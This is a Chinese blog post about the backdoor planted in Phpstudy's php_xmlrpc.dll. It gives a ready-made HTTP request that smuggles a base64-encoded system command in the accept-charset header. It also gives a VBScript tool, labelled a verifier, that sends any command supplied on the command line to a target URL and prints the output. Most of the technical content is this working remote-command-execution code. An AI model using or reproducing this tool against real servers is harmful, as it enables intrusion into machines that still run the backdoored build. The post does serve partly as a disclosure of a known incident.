背景图片
关于本站| 投稿说明| 下载说明
Phpstudy后门程序的验证程序 - Ya分享网
  • 首页
  • 自学教程
    • 网络安全
    • 编程教程
    • 设计教程
    • 破解教程
    • 其他教程
  • 网站相关
    • emlog教程
    • emlog插件
    • emlog主题
    • Dz论坛主题
    • Discuz插件
    • 网页特效
    • 网站源码
  • 软件仓库
    • 安卓软件
    • 电脑软件
    • 游戏助手
  • 软件源码
    • E4a源码
    • E4a类库
    • 易语言源码
  • 各类活动
  • 每日看点
  • SEO技巧
  • 更多功能
    • 留言吐槽
    • 文章归档
    • 我的邻居
    • 公告动态
    • 广告合作
    • 关于博主
    • 我的商城


登录后,享受更多优质服务哦
大哥! 个人中心退出登录
导航菜单
  • 首页
  • 自学教程
    • 网络安全
    • 编程教程
    • 设计教程
    • 破解教程
    • 其他教程
  • 网站相关
    • emlog教程
    • emlog插件
    • emlog主题
    • Dz论坛主题
    • Discuz插件
    • 网页特效
    • 网站源码
  • 软件仓库
    • 安卓软件
    • 电脑软件
    • 游戏助手
  • 软件源码
    • E4a源码
    • E4a类库
    • 易语言源码
  • 各类活动
  • 每日看点
  • SEO技巧
  • 更多功能
    • 留言吐槽
    • 文章归档
    • 我的邻居
    • 公告动态
    • 广告合作
    • 关于博主
    • 我的商城
Phpstudy

Phpstudy后门程序的验证程序

2019/12/9 小路  其他教程 7412 1

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。 正是这样一款公益性软件,2018年12月4日,西湖区公安分局网警大队接报案称,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。

犯罪分子主要是在php_xmlrpc.dll放入了恶意代码,可以利用它执行rce及反连等操作。

如果向其使用phpstudy的服务器发送发下格式数据包,就可以执行命令:  

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

上边代码块中的ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7是echo system("net user");的base64编码。

写了一个验证的vbs小程序,代码如下:

payload="echo 1111;system('"&wscript.arguments(1)&"');echo 1111;"
'wsh.echo base64encode(payload)
Set Retrieva = CreateObject("Msxml2.ServerXMLHTTP")	 
 
Retrieva.Open "Get", wscript.arguments(0), False
Retrieva.SetRequestHeader "accept-charset", base64encode(payload)
Retrieva.SetRequestHeader "Accept-Encoding", "gzip,deflate"
Retrieva.Send 
result=Split(Retrieva.ResponseTEXT,"1111")
wsh.echo result(1)
  
function base64encode(pstext)
dim oxml, ostream, onode
set oxml =createobject("msxml2.domdocument")
set ostream =createobject("adodb.stream")
set onode =oxml.createelement("tmpnode")
onode.datatype ="bin.base64"
ostream.charset ="gb2312"
ostream.type =2'0=adstateclosed 1=adstateopen
if ostream.state =0 then ostream.open()
ostream.writetext(pstext)
ostream.position =0
ostream.type =1'1=adtypebinary 2=adtypetext
onode.nodetypedvalue =ostream.read(-1)'-1=adreadall
ostream.close()
base64encode =onode.text
set onode =nothing
set ostream =nothing
set oxml =nothing
end Function

 

效果图如下:

 2.png

搜一下

 点赞:0  打赏  分享  海报

  • 打赏支付宝扫一扫
  • 打赏微信扫一扫
  • 打赏企鹅扫一扫
作者头像 作者名称 作者性别
小路
联系作者 作者主页

热门推荐

1 一键在线检测软件是否有病毒
2 在线图片优化找最佳压缩比
3 解封地址集合
4 极客战记免费试玩 想学编程的有福气了
5 腾讯START云游戏申请入口
6 如何解决苹果掉签?Ya分享网来给你答案

评论列表

取消回复

    评论

    1条评论
    1. avatar

      逗比的小暖 回复

      打卡时间:下午6:21:38,每日打卡 生活更精彩!

      中国 移动 2019-12-09 18:22

    •  
      Login

      逗比的小暖

      站长 主页
      用户中心
      评论管理
      退出登陆
      • 380文章
      • 291评论
      • 3微语
  1. 二零二一年02月
    一二三四五六日
    1234567
    891011121314
    15161718192021
    22232425262728
           
  2. 随机文章

      • 刺激Mr.cool-1.2透视自瞄辅助破解版
        • 本站推出邀请码注册!
          • 网站SEO必备的10款辅助工具
            • 萝莉小姐姐物语校服cos写真-115资源网
              • QQ惊现盗号黑阔
  3. 最新评论

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=16621217

      来了

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=123345596789

      好

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=355555666

      啦啦啦德玛西亚

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=849439519

      666牛

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=58268426674

      看累了

    • https://www.yafxw.com/content/templates/meta/Static/images/avatar.jpg

      666,流批

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=3315454805

      eyu,奥特曼

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=3102089143

      洗涤剂饿不

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=1551598097

      Yyyyyyyyyy我要看

    • https://www.yafxw.com/content/templates/meta/Api/qqtx.php/?qq=3125474532

      个

  4. 链接

    • 音乐外链
    • 奇妙资源网
  5. 网站统计 I 当前在线:1人

    • 本站管理:2位
    • 用户总数:41位
    • 置顶文章:2篇
    • 日志总数:380篇
    • 微语总数:3条
    • 评论总数:291条
    • 标签总数:133条
    • 页面总数:7页
    • 分类总数:28个
    • 链接总数:16条
    • 运行天数:476天
    • 最后更新:2月15日
  6. 用户登陆

    
    
    找回密码

    找回密码

    密码已找回?返回登陆

    用户注册

    
    
    စ
    
    已有账号?返回登陆
    Copyright © 2021Ya分享网 程序:Emlog5.31 主题:Meta 3.55 黑ICP备19007521号
    • 首页
    • Q 群
    • 搜索
    • 关于
    • 用户

    大家都在搜

    • 苹果手机
    • 优惠卷
    • 外链
    • 和平精英抽奖
    • 软件
    • 吃鸡辅助
    • Epic
    • 挂机宝
    • 网络安全
    • 游戏助手
    • 工具
    • 流通活动
    • 关于
    • 火箭少女101
    • QQ
    • 支付宝
    • 
    • 